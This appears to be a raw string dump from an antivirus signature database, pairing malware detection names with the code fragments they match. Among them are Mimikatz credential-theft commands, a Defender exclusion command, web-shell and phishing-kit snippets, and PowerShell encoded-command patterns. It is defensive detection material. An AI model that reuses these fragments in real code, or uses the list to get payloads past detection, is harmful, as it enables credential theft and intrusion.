!#ALFPER:ML:Staged:AutoKMSl? !#TELPER:Cert:Win32/DealPlyl? !#TELPER:Cert:Win32/CCSetupxA !#ALFPER:HSTR:Win32/BlackMoon BlackMoon RunTime Error BlackMoon RunTime ErrorxF !#BrowserModifier:Win32/IOBit LIObit_ 0utHomepageForSet 0utHomepageForSetxL !#TELPER:PossibleBrowserCertsModifier CertsFF.dat CertsOP.dat CertsOP.datxM !#TELPER:Crossrider_Updater crupdatedownloader /runupdater /runupdaterxQ !#TELPER:Crossrider_FFInstaller crfirefoxinstaller FirefoxUtils FirefoxUtilsxS !#TELPER:Crossrider_ChromeInstaller crchromeinstaller ChromeUtils ChromeUtilsxU !#TEL:Program:Win32/CouponServer Coupon Server CrossRider CrossRiderxg !#TELPER:LuckyBrowse:Main api.lucky-browse.com/tasks.php?action= LuckyBrowse\\install.dat LuckyBrowse\\install.datxv !#TEL:KlipPalCby:BHO //api -a.akamaihd.net/gics2 IEClientModule !#TELPER:HSTR:Program:Win32/Orbitum Orbitum Installer/1.0 orbitum.com/xv !#TELPER:Crossrider:CodeDldr crcodedownloader UninstallerOfferUrl ie-code-downloader-error.gif ie-code-downloader-error.gifxx !#HSTR:BrowserModifier:Win32/GoogleToolbarNotifierSWG64 AVProtectorBho@@ SearchWithGooglex !#TEL:HSTR:Program:Win32/Dexon \\W95ws2setup.exe \\Agent.exe /Send Agent.exe dat\\Dexon\\Agent PCUID_countdown \\W95ws2setup.exe\\Agent.exe /SendAgent.exedat\\Dexon\\AgentPCUID_countdownx !#TELPER:DealFinder_Crossrider \\DealFinder by Savings.com-BrowserExtensionUninstall crossrideragentinstallation crossrideragentinstallationx !#HSTR:BrowserModifier:Win32/GoogleToolbarNotifierSWG branches\\protector_release_branch\\ protector\\build\\opt\\obj\\swg protector\\build\\opt\\obj\\swgx !#TELPER:HSTR:Bundler:Win32/PCMega CONTAPRIME /SELECT /IE /FIREFOX /S /OPTIMIZE /PARTNER=vn /CHANNEL=pcdealply panel_deal panel_dealx !#TELPER:Program:Win32/CustPromo ?AUICustomerPromosBHO@@ customerpromos-a.akamaihd.net/CustomerPromox !#TELPER:HSTR:Program:Win32/Yandex vkontakte-dj-elements get_dlg_yandex_setup_bg YABROWSER YELEMENTS !#TELPER:HSTR:Program:Win32/LuckyBrowse mainBinaryRelativePath\":\" \\\\luckybrowse.exe isAddToFirewall\":true mainBinaryAutoRunExecuteCommandLine mainBinaryAutoRunExecuteCommandLinex !#TELPER:HSTR:ChromePluginBypass.B SOFTWARE\\Google\\Update\\ClientState\\{ 2.0-dev-multi-chrome }ap2.0-dev-multi-chrome \\Preferences \\Preferences-install !#TELPER:Program:Win32/DownloadSponsor set_MyDMRConnection /uac.php?clientid= &cid= &source &setupid= !#TEL:HSTR:Win32/CountInstall HasCountInstallation /sethao123homepage /CoolMyMusic /AgencyID /oldversionagentidx !#TELPER:HSTR:Win32/PriceFountain Software\\PriceFountain dll-file-nameprfo.dllbrowser-identifier-ie PriceFountain.netx !#TELPER:CrossriderFramework \\Crossrider Installation failed \\CrossriderInstallation failed crossinstaller err_os_not_supported :yet_another_secret err_extrating_ie_enabler Unmixing err_extrating_ie_enablerUnmixingx !#TEL:Exploit:Win64/DcompBSOD NtDCompositionCreateConnection NtDCompositionDestroyConnection NtDCompositionGetConnectionBatch NtDCompositionBeginFrame NtDCompositionDiscardFrame NtDCompositionConfirmFrame NtDCompositionReleaseAllResources NtDCompositionSuspendAnimations NtDCompositionSuspendAnimations~8 M!#TELPER:NID:Program:Win32/Orbitum !#TEL:HSTR:TrojanDownloader:O97M/Adnel .thisdocument .readystate .open .status .write !#TEL:AGGR:SchdTaskCmdLineArtifactLua:SchdTaskCmdLineArtifact !#AGGR:JCM_Vampa_GE50AGGR:CombinedJavaClass&Lua:JCM_Vampa:GE50 )!#AGGR:JCM_Vampa_GE50AGGR:CombinedJavaClass&Lua:JCM_Vampa:GE50 !#TEL:AGGR:ESEQ_1.BSCPT:EXPSEQ_1.A|SCPT:EXPSEQ_1.B|SCPT:EXPSEQ_1.C /!#TEL:AGGR:ESEQ_1.BSCPT:EXPSEQ_1.A|SCPT:EXPSEQ_1.B|SCPT:EXPSEQ_1.C !#TEL:DOC/EmbeddedHttpWebvideoInEmail&SCPT:DOC/EmbeddedHttpWebvideo&AGGR:OfficeFile_WordExt =!#TEL:DOC/EmbeddedHttpWebvideoInEmail&SCPT:DOC/EmbeddedHttpWebvideo&AGGR:OfficeFile_WordExt !#TEL:VB/KernelCallViaOrdinalSCPT:VBS/KernelCallViaOrdinal&(SCPT:VBSInside|MHSTR:MacroInside) @!#TEL:VB/KernelCallViaOrdinalSCPT:VBS/KernelCallViaOrdinal&(SCPT:VBSInside|MHSTR:MacroInside) !#TEL:HackTool:Win32/Keygen.GLua:ContextFromWebmail&SuspiciousNFOfilename&SuspiciousKEYGENfilename E!#TEL:HackTool:Win32/Keygen.GLua:ContextFromWebmail&SuspiciousNFOfilename&SuspiciousKEYGENfilename !#TEL:TrojanDownloader:JS/Nemucod.TSGLua:ContextFromWebmail&SCPT:Nemucod_eval&LUA:DoubleDotWsfExtension k%B!#TEL:TrojanDownloader:JS/Nemucod.TSGLua:ContextFromWebmail&SCPT:Nemucod_eval&LUA:DoubleDotWsfExtension !#TEL:TrojanDownloader:JS/Nemucod.ACGLua:ContextFromWebmail&!SCPT:Nemucod_exclusion&Lua:JSExt&TARG:TrojanDownloader:JS/Nemucod %Y!#TEL:TrojanDownloader:JS/Nemucod.ACGLua:ContextFromWebmail&!SCPT:Nemucod_exclusion&Lua:JSExt&TARG:TrojanDownloader:JS/Nemucod !#ALF:SinglePagePDFInEmailInEmail&BM_PDF_FILE&LUA:FileSizeLE80000.A&SCPT:PDF.OnlyOnePage&SCPT:PDF.HasImage&SCRIPT:PDF/Has_Link_URI h!#ALF:SinglePagePDFInEmailInEmail&BM_PDF_FILE&LUA:FileSizeLE80000.A&SCPT:PDF.OnlyOnePage&SCPT:PDF.HasImage&SCRIPT:PDF/Has_Link_URI !#TEL:TrojanDownloader:JS/Nemucod.ACBL %]!#TEL:TrojanDownloader:JS/Nemucod.ACBL RunsDestructiveCMDsParent 8db3102b84dd 209d7fcfa7edf ReportInternalDetection TYPE_ASYNC_LOWFI edb3e9ab3ed5 \\msert.exe %%common_appdata%% \\ProgramData GetCommandLineFromService !#Lua:LessThanTenFilesFoldersInZip //Lua:MoreThan100FilesFoldersInZip #//Lua:MoreThan100FilesFoldersInZip //Lua:LessThanTenFilesFoldersInZip #//Lua:LessThanTenFilesFoldersInZip 169b3cfa87a96 \\msexchangemailboxreplication.exe \"\\msexchangemailboxreplication.exe \\msexchangedelivery.exe \\msexchangemailboxreplicationworker.exe (\\msexchangemailboxreplicationworker.exe !#LUA:PowerShellEncodedCommand !#LUA:PowerShellEncodedCommandObMpAttributes encodedcommand ([%w/+=]+) FromEncodedCommand [PSEncodedCommand] %:%:FromBase64String%(%' [PSBase64String] 5f58cb6c155a1 \\data\\exploits\\ metasploit mtk-su cve-20 supersu strace ctssecurity !#Lua:NtdsCleanWriters !#Lua:NtdsCleanWritersObMpAttributes tdb|edb|mdb|dat|ore|pds|sdb|bim|vol|asf|adb|tmp 0tdb|edb|mdb|dat|ore|pds|sdb|bim|vol|asf|adb|tmp catdb|mail.msmessagestore|dhcp.mdb|webcachev01.dat|cachestorage.edb|windowsmail.msmessagestore|defaultstore|actorstatestore|persiststore.edb|imosstore|fs.edb|rm.edb|upgradeservicestore|serverservice.edb|masterservice.edb|6260B5C4| \\webcache\\ \\system32\\logfiles windows\\cryptoguard !#Lua:Virus:Win32/Nabucur epsec_not_executable no_imports_dir no_iat LoD:Virus:Win32/Nabucur.B LoD:Virus:Win32/Nabucur.C !#Lua:ContextualDropOfficeTmpExe.B Lua:ContextualDropOfficeTmpExe.B !Lua:ContextualDropOfficeTmpExe.B !#Lua:Context/RightToLeftOverride.gen!D Lua:Context/RightToLeftOverride.DA #Lua:Context/RightToLeftOverride.DA Lua:Context/RightToLeftOverride.DB #Lua:Context/RightToLeftOverride.DB Lua:Context/RightToLeftOverride.DC #Lua:Context/RightToLeftOverride.DC Lua:Context/RightToLeftOverride.DD #Lua:Context/RightToLeftOverride.DD !#Lua:ContextualDropOfficeTmpExe.A :\\program files\\microsoft office !:\\program files\\microsoft office Lua:ContextualDropOfficeTmpExe.A !Lua:ContextualDropOfficeTmpExe.A 3540b5ded5b2 IsResponse GetRawResponseBlob GetRawRequestBlob SMB(....)[ ]...(....) readu32 !#LUA:PayloadTempDropFile payload.exe !#Lua:DropSuspiciousNonPEFiles Lua:LNKdroppedByProcess Lua:JSdroppedByProcess Lua:VBSdroppedByProcess Lua:COMdroppedByProcess Lua:PSdroppedByProcess d6b37b4917a7 d6b37b4917a7IncludesBMLuaLib -encode \t-encode -decode \t-decode -urlcache takari regulatory !#Lua:TokenRelevanceMetric.A !#Lua:TokenRelevanceMetric.AObMpAttributes \\scans\\ Lua:FileNameTokenRelevanceMetric.A #Lua:FileNameTokenRelevanceMetric.A !#TEL:DefenderTa =[[],[/[!\\#]/g]]; !#SCPT:Exploit:Win32/Pdfjsc.AGC bbb0b`b```g0!w310 !#SCPT:JS/Nemucod.ReturnWscript \"returnws\"+\"cri\"+ !#SCPT:Trojan:VBS/DNSChanger.B1 /chupacabras.php? !#SCPT:Trojan:VBS/DNSChanger.E1 locatef s=\"http !#SCPT:Trojan:VBS/Valyria.A!sl3 functionregexists !#SCRIPT:PSExploitAPIImports.K1 getasynckeystate( !#SCRIPT:PSExploitAPIImports.K2 getkeyboardstate( !#SCRIPT:PoshKeyloggerExclusion ninaronline.co.uk !#SCRIPT:Possible_CSharpPrivate privatestatic !#SCRIPT:PowerShell/Conqerat.C4 =readsmbresponse( !#SCRIPT:PowerShell/Shockley.A2 :userdnsdomain)){ !#SCRIPT:Ransom:PS/Poshkod.S001 =$_.name+'.locky' !#SCRIPT:SuspLnkFromRevobfoos.A cls&cls&cls&start '<-coco8_xxxyou-> !#Scpt:PS:CryptoStreamCreation4 .createdecryptor( !#Trojan:AndroidOS/OpFakeSms.D1 res/raw/bdata.dat !#Trojan:AndroidOS/OpFakeSms.D4 assets/payed.html !#Trojan:HTML/FakeAlert.C!strg4 varphone=\"+1-888- !#ALFPER:SCRIPT:Win32/Rutspade.A )= !#ALFPER:SCRIPT:Win32/Rutspade.A updatestarrepair !#BRUTE:SCHTSK:Expert:Feature:38 )= !#BRUTE:SCHTSK:Expert:Feature:38 <waketorun>false !#BRUTE:SCHTSK:Expert:Feature:41 )= !#BRUTE:SCHTSK:Expert:Feature:41 <actionscontext= !#Exploit:O97M/DDEDownloader.C.3 )= !#Exploit:O97M/DDEDownloader.C.3 !#SCPT:AutoItApi_AdlibUnRegister )= !#SCPT:AutoItApi_AdlibUnRegister adlibunregister( !#SCPT:AutoItApi_AutoItSetOption )= !#SCPT:AutoItApi_AutoItSetOption autoitsetoption( !#SCPT:AutoItApi_ControlGetFocus )= !#SCPT:AutoItApi_ControlGetFocus controlgetfocus( !#SCPT:AutoItApi_ControlListView )= !#SCPT:AutoItApi_ControlListView controllistview( !#SCPT:AutoItApi_ControlTreeView )= !#SCPT:AutoItApi_ControlTreeView controltreeview( !#SCPT:AutoItApi_DllCallbackFree )= !#SCPT:AutoItApi_DllCallbackFree dllcallbackfree( !#SCPT:AutoItApi_DllStructCreate )= !#SCPT:AutoItApi_DllStructCreate dllstructcreate( !#SCPT:AutoItApi_DllStructGetPtr )= !#SCPT:AutoItApi_DllStructGetPtr dllstructgetptr( !#SCPT:AutoItApi_DriveSpaceTotal )= !#SCPT:AutoItApi_DriveSpaceTotal drivespacetotal( !#SCPT:AutoItApi_FileGetEncoding )= !#SCPT:AutoItApi_FileGetEncoding filegetencoding( !#SCPT:AutoItApi_FileGetLongName )= !#SCPT:AutoItApi_FileGetLongName filegetlongname( !#SCPT:AutoItApi_FileGetShortcut )= !#SCPT:AutoItApi_FileGetShortcut filegetshortcut( !#SCPT:AutoItApi_FileReadToArray )= !#SCPT:AutoItApi_FileReadToArray filereadtoarray( !#SCPT:AutoItApi_GUICtrlGetState )= !#SCPT:AutoItApi_GUICtrlGetState guictrlgetstate( !#SCPT:AutoItApi_GUICtrlSetColor )= !#SCPT:AutoItApi_GUICtrlSetColor guictrlsetcolor( !#SCPT:AutoItApi_GUICtrlSetImage )= !#SCPT:AutoItApi_GUICtrlSetImage guictrlsetimage( !#SCPT:AutoItApi_GUICtrlSetLimit )= !#SCPT:AutoItApi_GUICtrlSetLimit guictrlsetlimit( !#SCPT:AutoItApi_GUICtrlSetState )= !#SCPT:AutoItApi_GUICtrlSetState guictrlsetstate( !#SCPT:AutoItApi_GUICtrlSetStyle )= !#SCPT:AutoItApi_GUICtrlSetStyle guictrlsetstyle( !#SCPT:AutoItApi_IniWriteSection )= !#SCPT:AutoItApi_IniWriteSection iniwritesection( !#SCPT:AutoItApi_ProcessGetStats )= !#SCPT:AutoItApi_ProcessGetStats processgetstats( !#SCPT:AutoItApi_StringTrimRight )= !#SCPT:AutoItApi_StringTrimRight stringtrimright( !#SCPT:AutoItApi_TrayItemGetText )= !#SCPT:AutoItApi_TrayItemGetText trayitemgettext( !#SCPT:AutoItApi_TrayItemSetText )= !#SCPT:AutoItApi_TrayItemSetText trayitemsettext( !#SCPT:AutoItApi_WinGetClassList )= !#SCPT:AutoItApi_WinGetClassList wingetclasslist( !#SCPT:NemucodQueryStr_blacklist )= !#SCPT:NemucodQueryStr_blacklist /counter/?ad=1ay /counter/?ad=1hi /counter/?id=lrd /counter/?id=lww /counter/?id=y5p )= !#SCPT:PowerShell/EncodedCommand !#SCPT:Trojan:JS/Obfuse.DRC3!MTB )= !#SCPT:Trojan:JS/Obfuse.DRC3!MTB return\"owe\"+\"rs\" !#SCPT:Trojan:PHP/Phish.PJS4!MTB )= !#SCPT:Trojan:PHP/Phish.PJS4!MTB cardno:\".$_post[ !#SCPT:Trojan:PHP/Phish.PJS7!MTB )= !#SCPT:Trojan:PHP/Phish.PJS7!MTB atmpin:\".$_post[ !#SCRIPT:CmdFileOutputTaskList.B )= !#SCRIPT:CmdFileOutputTaskList.B tasklist>%temp%\\ !#SCRIPT:JS/MouseEventFunction.A )= !#SCRIPT:JS/MouseEventFunction.A onclick=\" !#SCRIPT:PowerShell/ObfusNum_IEX )= !#SCRIPT:PowerShell/ObfusNum_IEX 23,5,119,123,102 !#SCRIPT:PowerShell/Poisonweb.A1 )= !#SCRIPT:PowerShell/Poisonweb.A1 $env:tmp\\ .log !#SCRIPT:PowerShell/PublicStatic )= !#SCRIPT:PowerShell/PublicStatic !#TrojanDropper:VBS/Bynoco!ptb04 )= !#TrojanDropper:VBS/Bynoco!ptb04 objwshell.rundir !!#ALF:Exploit:Script/Krolly.A!dha )=!!#ALF:Exploit:Script/Krolly.A!dha xdeviceexploit( !!#ALF:Phish:PHP/PhishKitXodni!MTB )=!!#ALF:Phish:PHP/PhishKitXodni!MTB root@indoxploit !!#HackTool:Win32/Mikatz.J!dumcred )=!!#HackTool:Win32/Mikatz.J!dumcred dumpcredentials !!#LowfiTrojan:HTML/Redirector.ZZM )=!!#LowfiTrojan:HTML/Redirector.ZZM g.php?d=x\"></sc !!#SCPT:Exploit:HTML/Axpergle.AK.2 )=!!#SCPT:Exploit:HTML/Axpergle.AK.2 value=\"gvtrvze= )=!!#SCPT:JS/Obfuscator.Redundancy.H )))*1)== )=!!#SCPT:JS/Obfuscator.Split.eval.A \"e\",\"v\",\"a\",\"l\" )=!!#SCPT:JS/Obfuscator.TEMPFolder.A \"%tem\" !!#SCPT:JsMethodFunc_dispatchevent )=!!#SCPT:JsMethodFunc_dispatchevent .dispatchevent( !!#SCPT:JsMethodFunc_getutcminutes )=!!#SCPT:JsMethodFunc_getutcminutes .getutcminutes( !!#SCPT:JsMethodFunc_getutcseconds )=!!#SCPT:JsMethodFunc_getutcseconds .getutcseconds( !!#SCPT:JsMethodFunc_isprototypeof )=!!#SCPT:JsMethodFunc_isprototypeof .isprototypeof( !!#SCPT:JsMethodFunc_localecompare )=!!#SCPT:JsMethodFunc_localecompare .localecompare( !!#SCPT:JsMethodFunc_setutcminutes )=!!#SCPT:JsMethodFunc_setutcminutes .setutcminutes( !!#SCPT:JsMethodFunc_setutcseconds )=!!#SCPT:JsMethodFunc_setutcseconds .setutcseconds( !!#SCPT:JsMethodFunc_toexponential )=!!#SCPT:JsMethodFunc_toexponential .toexponential( !!#SCPT:O97M/ObfShellLaunch.C!amsi )=!!#SCPT:O97M/ObfShellLaunch.C!amsi @pwsh !!#SCPT:Phish:PHP/Url_IndexHtml.GG )=!!#SCPT:Phish:PHP/Url_IndexHtml.GG url=index.html? !!#SCPT:Ransom:BAT/CruelCrypt.Pra3 )=!!#SCPT:Ransom:BAT/CruelCrypt.Pra3 del/s/q*.sister !!#SCPT:Trojan:HTML/Phish.DRD4!MTB )=!!#SCPT:Trojan:HTML/Phish.DRD4!MTB viewpdfdocument !!#SCRIPT:DynamicInvoke_ExecStager )=!!#SCRIPT:DynamicInvoke_ExecStager .executestager( !!#SCRIPT:FlashExp_check_spray_exp )=!!#SCRIPT:FlashExp_check_spray_exp check_spray_exp )=!!#SCRIPT:JS/BlacoleRefLowfi.Frag3 =0;try{;}catch( )=!!#SCRIPT:PowerShell/Invoke-Apex.B invoke-download !!#SCRIPT:PowerShell/Macroburst.J1 )=!!#SCRIPT:PowerShell/Macroburst.J1 get-azvm-status !!#SCRIPT:PowerShell/Macroburst.R2 )=!!#SCRIPT:PowerShell/Macroburst.R2 new-azureaduser !!#SCRIPT:Python/PyInputKeyboard.A )=!!#SCRIPT:Python/PyInputKeyboard.A pynput.keyboard !!#SCRIPT:Trojan:VBS/Startpage.G.2 )=!!#SCRIPT:Trojan:VBS/Startpage.G.2 ifext=\"lnk\"then !!#SCRIPT:Worm:AutoIt/YahLover.R.2 )=!!#SCRIPT:Worm:AutoIt/YahLover.R.2 send(\"^v{enter} !!#Trojan:BAT/CryptReplDow.AE3!MTB )=!!#Trojan:BAT/CryptReplDow.AE3!MTB taskkill/t/f/im \"!#SCPT:GeneralityExploitStrRare.AI )=\"!#SCPT:GeneralityExploitStrRare.AI voucher \"!#SCPT:GeneralityExploitStrRare.AZ )=\"!#SCPT:GeneralityExploitStrRare.AZ spray struct \"!#SCPT:JS/Obfuscator.Decimal.var.A )=\"!#SCPT:JS/Obfuscator.Decimal.var.A 118,97,114,32, )=\"!#SCPT:JS/Obfuscator.InnerScript.F )=\"!#SCPT:JS/Obfuscator.Split.MSXML.A msxm\"+\" \"!#SCPT:JS/Obfuscator.Split.floor.A )=\"!#SCPT:JS/Obfuscator.Split.floor.A flo\"+\"o \"!#SCPT:JS/Obfuscator.hex.WScript.A )=\"!#SCPT:JS/Obfuscator.hex.WScript.A 57736372697074 \"!#SCPT:Phish:PHP/Freakzbrothers.GG )=\"!#SCPT:Phish:PHP/Freakzbrothers.GG freakzbrothers \"!#SCPT:Phish:PHP/PhishPageXodni.B1 )=\"!#SCPT:Phish:PHP/PhishPageXodni.B1 inc/config.php \"!#SCPT:StringConcat!DownloadFile.B )=\"!#SCPT:StringConcat!DownloadFile.B =\"ile('http:// \"!#SCPT:Trojan:HTML/Phish.PYHI2!MTB )=\"!#SCPT:Trojan:HTML/Phish.PYHI2!MTB dhakan:dhakan, \"!#SCPT:Trojan:JS/IFrameXross.A!ib3 )=\"!#SCPT:Trojan:JS/IFrameXross.A!ib3 onload=alert() \"!#SCPT:Trojan:PowerShell/PSImage.D )=\"!#SCPT:Trojan:PowerShell/PSImage.D -bor($p.g-band \"!#SCRIPT:HTML/TechMsgFakeActions.J )=\"!#SCRIPT:HTML/TechMsgFakeActions.J todiagnoseyour \"!#SCRIPT:Worm:JS/Pouteriona_Baslik )=\"!#SCRIPT:Worm:JS/Pouteriona_Baslik var=cek=baslik \"!#TrojanDownloader:JS/Nemucod4!MTB )=\"!#TrojanDownloader:JS/Nemucod4!MTB =\"appendchunk\" \"!#TrojanDownloader:JS/Vjworm.A!al1 )=\"!#TrojanDownloader:JS/Vjworm.A!al1 \"hkcu\\\\vjw0rm\" \"!#TrojanDownloader:JS/Vjworm.A!al3 )=\"!#TrojanDownloader:JS/Vjworm.A!al3 createshortcut \"!#Worm:VBS/Jenxcus.codedbynj!Lowfi )=\"!#Worm:VBS/Jenxcus.codedbynj!Lowfi '<[codedbynj]> #!#SCPT:Backdoor:ASP/Dirtelti.G5!MTB )=#!#SCPT:Backdoor:ASP/Dirtelti.G5!MTB arguments=\"/c #!#SCPT:Backdoor:ASP/Dirtelti.J2!MTB )=#!#SCPT:Backdoor:ASP/Dirtelti.J2!MTB enjoyhacking! #!#SCPT:GeneralityExploitStrCommon.G )=#!#SCPT:GeneralityExploitStrCommon.G typeconfusion #!#SCPT:GeneralityExploitStrCommon.W )=#!#SCPT:GeneralityExploitStrCommon.W )=#!#SCPT:GeneralityExploitStrCommon.X payload )=#!#SCPT:JS/Obfuscator.HexMixed.cmd.A \\u0063\\u006dd \\u0063m\\u0064 c\\u006d\\u0064 )=#!#SCPT:JS/Obfuscator.HexMixed.run.A \\u0052\\u0075n \\u0052u\\u006e r\\u0075\\u006e #!#SCPT:Phish:PHP/Domcheck_AtO365.GG )=#!#SCPT:Phish:PHP/Domcheck_AtO365.GG '@office365.' #!#SCPT:Schopets!ReverseWscriptShell )=#!#SCPT:Schopets!ReverseWscriptShell llehs.tpircsw #!#SCRIPT:Exploit:JS/CVE-2014-4095-5 )=#!#SCRIPT:Exploit:JS/CVE-2014-4095-5 location.href )=#!#SCRIPT:PowerShell/Mikatz!commands kerberos::ptc kerberos::ptt kerberos::tgt sekurlsa::msv sekurlsa::pth sekurlsa::ssp #!#SCRIPT:Ransom:Win32/Stampado_Kill )=#!#SCRIPT:Ransom:Win32/Stampado_Kill taskkill/f/fi )=#!#SCRIPT:Ransom:Win32/Stampado_Name stampado_kill #!#SCRIPT:VirTool:JS/Obfuscator.GO-4 )=#!#SCRIPT:VirTool:JS/Obfuscator.GO-4 varrtwa,rtwb= )=#!#SCRIPT:Worm:Win32/Gamarue.gen!lnk .001,rundll32 .nil,rundll32 .xxc,rundll32 )=#!#Script:Trojan:JS/Certor.A!Taskill #!#Trojan:AutoIt/AgentTesla.SP14!MTB )=#!#Trojan:AutoIt/AgentTesla.SP14!MTB 2022352229\")) #!#TrojanDownloader:VBS/Genbhv.G!gc1 )=#!#TrojanDownloader:VBS/Genbhv.G!gc1 $!#SCPT:CodeOnly.RpivotClientServer.A )=$!#SCPT:CodeOnly.RpivotClientServer.A id_by_socket $!#SCPT:Trojan:PowerShell/Shelliece.3 )=$!#SCPT:Trojan:PowerShell/Shelliece.3 +0]*16777216 $!#SCPT:Trojan:PowerShell/Shelliece.6 )=$!#SCPT:Trojan:PowerShell/Shelliece.6 seterrormode $!#SCPT:TrojanDropper:O97M/Obfuse.DD1 )=$!#SCPT:TrojanDropper:O97M/Obfuse.DD1 importsocket )=$!#SCRIPT:TrojanDownloader:JS/Rusem.2 svchost.like $!#TrojanDownloader:JS/Nemucod!6fbd_2 )=$!#TrojanDownloader:JS/Nemucod!6fbd_2 /cpowershell %!#SCPT:Backdoor:ASP/b374kShell.A3!MTB )=%!#SCPT:Backdoor:ASP/b374kShell.A3!MTB ?dir=\"&xcwd %!#SCPT:JS/Obfuscator.Redundancy.new.A )=%!#SCPT:JS/Obfuscator.Redundancy.new.A ==newarray( %!#SCPT:JS/Obfuscator.Split.Alphabet.A )=%!#SCPT:JS/Obfuscator.Split.Alphabet.A stuvwxy\"+\"z %!#SCPT:Trojan:O97M/CVE-2017-11882.CS2 )=%!#SCPT:Trojan:O97M/CVE-2017-11882.CS2 \\objautlink %!#SCPT:TrojanDownloader:JS/Banload.M2 )=%!#SCPT:TrojanDownloader:JS/Banload.M2 =keycount(\" %!#SCPT:TrojanDownloader:JS/Nemucod.Z5 )=%!#SCPT:TrojanDownloader:JS/Nemucod.Z5 [0]-3!=74|| %!#SCRIPT:TrojanDownloader:VBS/Rtbot.A )=%!#SCRIPT:TrojanDownloader:VBS/Rtbot.A \\booter.dat %!#Trojan:PowerShell/Paliza.A!lnk_Dhs3 )=%!#Trojan:PowerShell/Paliza.A!lnk_Dhs3 -literalpat &!#Obfuscator:VBS/JenxcusDZCLOVER!Lowfi )=&!#Obfuscator:VBS/JenxcusDZCLOVER!Lowfi dzclover=\" &!#SCPT:Exploit:Win32/ShellLikeHexStr.3 )=&!#SCPT:Exploit:Win32/ShellLikeHexStr.3 fe0e8eafff &!#SCPT:TrojanDownloader:JS/Nemucod.IC4 )=&!#SCPT:TrojanDownloader:JS/Nemucod.IC4 =[\"http:// )=&!#SCPT:TrojanDownloader:JS/Nemucod.SC1 this[\"\\145 this[\"\\x65 )=&!#SCPT:TrojanDownloader:JS/Nemucod.SC3 \"](\"\\u0043 )=&!#SCPT:TrojanDownloader:JS/Nemucod.SC4 \"](\"\\u006e &!#SCPT:TrojanDownloader:JS/Nemucod.val )=&!#SCPT:TrojanDownloader:JS/Nemucod.val =\"=2\";else &!#SCPT:TrojanDownloader:JS/Nemucod:Z00 )=&!#SCPT:TrojanDownloader:JS/Nemucod:Z00 =['%',\"'\", &!#SCRIPT:Exploit:SWF/CVE-2016-1010.B-6 )=&!#SCRIPT:Exploit:SWF/CVE-2016-1010.B-6 copypixels '!#SCPT:TrojanDownloader:Java/Banload.K2 )='!#SCPT:TrojanDownloader:Java/Banload.K2 force_uac '!#SCPT:TrojanDownloader:Java/Banload.K3 )='!#SCPT:TrojanDownloader:Java/Banload.K3 limparreg '!#SCPT:TrojanDownloader:O97M/Obfuse.NB2 )='!#SCPT:TrojanDownloader:O97M/Obfuse.NB2 '!#SCPT:TrojanDownloader:O97M/Powdow.SX6 )='!#SCPT:TrojanDownloader:O97M/Powdow.SX6 ).split($ '!#SCPT:TrojanDownloader:VBS/Banload.BT3 )='!#SCPT:TrojanDownloader:VBS/Banload.BT3 .runxxyyr '!#SCPT:TrojanDownloader:VBS/Donvibs.CM3 )='!#SCPT:TrojanDownloader:VBS/Donvibs.CM3 filedata= '!#SCPT:TrojanDownloader:VBS/Donvibs.CS2 )='!#SCPT:TrojanDownloader:VBS/Donvibs.CS2 '!#SCRIPT:Exploit:Win32/CVE-2012-4792-B1 )='!#SCRIPT:Exploit:Win32/CVE-2012-4792-B1 exploit() '!#Scpt:Trojan:AutoIt/AlienStart.AD5!MTB )='!#Scpt:Trojan:AutoIt/AlienStart.AD5!MTB =dllcall( (!#SCPT:Linux/Trojan.mal_attr_ChmodToExec )=(!#SCPT:Linux/Trojan.mal_attr_ChmodToExec chmod755 (!#SCPT:TrojanDownloader:JS/Swabfex_emu_3 )=(!#SCPT:TrojanDownloader:JS/Swabfex_emu_3 070B095E (!#SCPT:TrojanDownloader:Java/Banload.G3B )=(!#SCPT:TrojanDownloader:Java/Banload.G3B p64.jpeg (!#SCPT:TrojanDownloader:O97M/Qakbot.BKK2 )=(!#SCPT:TrojanDownloader:O97M/Qakbot.BKK2 (!#SCPT:TrojanDownloader:O97M/Qakbot.PJH1 )=(!#SCPT:TrojanDownloader:O97M/Qakbot.PJH1 c:\\grdbs )!#SCPT:TrojanDownloader:O97M/Zloader.STO5 )=)!#SCPT:TrojanDownloader:O97M/Zloader.STO5 dtofile \tdtofile )!#Script:Trojan:JS/NemuKryptikDow.AD!MTB2 )=)!#Script:Trojan:JS/NemuKryptikDow.AD!MTB2 \t.write( *!#SCPT:Exploit:O97M/CVE-2017-11882.AV5!MTB )=*!#SCPT:Exploit:O97M/CVE-2017-11882.AV5!MTB 4d6174 +!#SCPT:Exploit:O97M/CVE-2017-11882.APR5!MTB )=+!#SCPT:Exploit:O97M/CVE-2017-11882.APR5!MTB }\\rtf +!#SCPT:Exploit:O97M/CVE-2017-11882.APR7!MTB )=+!#SCPT:Exploit:O97M/CVE-2017-11882.APR7!MTB +!#SCPT:Exploit:O97M/CVE-2017-11882.APS5!MTB )=+!#SCPT:Exploit:O97M/CVE-2017-11882.APS5!MTB !#Shlayer1 )> #!/bin/bashcd\"$(dirname\"$bash_source\")\" )#!/bin/bashcd\"$(dirname\"$bash_source\")\" for(i=0;i!=ar2.length;i++){q=ar2[i] %for(i=0;i!=ar2.length;i++){q=ar2[i] !#SCPT:NuqelIni size01= $size01= @filedownload2= @size02= !#SCPT:Kaspersky \\kasperskylab\\kasperskyanti-virus #\\kasperskylab\\kasperskyanti-virus !#SCPT:Killav.A2 add-mppreference-exclusionpathc:\\ #add-mppreference-exclusionpathc:\\ !#RdContacts_Perm android.permission.read_contacts \"android.permission.read_contacts !#SCPT:B64PSMal.A jaaxacaapqagaccajabjacaapqagacca \"jaaxacaapqagaccajabjacaapqagacca !#SCPT:Blinky.D-1 0303000000000000c000000000000046 \"0303000000000000c000000000000046 ishelldispatch \"ishelldispatch .shellexecute(\" iswbemservicesex.execmethodasync \"iswbemservicesex.execmethodasync !#SCPT:Nebbier.AB .send(\"data=\"+ \".send(\"data=\"+ +\"&token=\"+ !#SCPT:SchTask.A1 createobject(\"schedule.service\") \"createobject(\"schedule.service\") eu.vortex-win.data.microsoft.com \"eu.vortex-win.data.microsoft.com us.vortex-win.data.microsoft.com \"us.vortex-win.data.microsoft.com !#SCRIPT:Mavil.B3 /loader/gateway.php?file=url.txt \"/loader/gateway.php?file=url.txt !#SCPT:CoreDriveAL core_project_nam !core_project_nam core_version !#SCPT:Nemucod.CL4 !ri\"+\"!pt! !!ri\"+\"!pt! !#SCPT:Webshell.V3 passthru(base64_decode($_server !passthru(base64_decode($_server !#SCRIPT:GrantType grant_type=\"authorization_code\" !grant_type=\"authorization_code\" !#SCPT:CookstoneA.Y temp_authkey_handshake_started 